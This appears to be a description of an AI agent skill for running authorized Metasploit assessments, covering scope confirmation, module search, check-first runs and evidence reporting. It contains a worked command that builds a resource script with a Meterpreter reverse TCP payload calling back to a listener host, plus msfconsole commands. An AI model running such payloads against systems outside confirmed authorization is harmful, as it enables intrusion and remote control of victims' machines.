Plan and execute authorized Metasploit assessments for OpenClaw tasks with repeatable workflows, including target triage, exploit module selection, option tu...
Use this skill to run deterministic and auditable Metasploit workflows for authorized security testing.
Prefer a check-first workflow and generate repeatable .rc scripts via scripts/build_rc.py instead of ad hoc console typing.
scripts/build_rc.py.msfconsole with check before run or exploit.Require explicit confirmation of:
If scope is unclear, stop and ask for clarification before proceeding.
Capture minimum actionable context:
Use this context to justify each module choice.
Use search and info in msfconsole to narrow candidates:
search type:exploit cve:2023 service:http
info exploit/linux/http/<module_name>
show options
show payloads
Choose modules by:
For common mappings and tradeoffs, read module-selection.md.
Generate reproducible execution scripts:
python3 scripts/build_rc.py \
--module exploit/linux/http/example_module \
--rhosts 10.10.10.15 \
--rport 8080 \
--payload linux/x64/meterpreter/reverse_tcp \
--lhost 10.10.10.5 \
--lport 4444 \
--set TARGETURI=/app \
--check \
--job \
--output run_example.rc
Review generated commands before execution:
Run with logging enabled:
msfconsole -q -r run_example.rc
Inside msfconsole, verify:
check output statusrun or exploit resultsessions -l visibilityIf exploitation fails, adjust one variable at a time and re-run.
Minimum evidence set:
Use workflow.md for command-level checklists and reporting structure.
Produce output with:
Keep reports concise and technically verifiable.
Generate a repeatable Metasploit .rc resource script from structured options.
Module and payload selection heuristics with common service mappings.
Command checklist for execution, troubleshooting loop, and report field requirements.
ZIP package — ready to use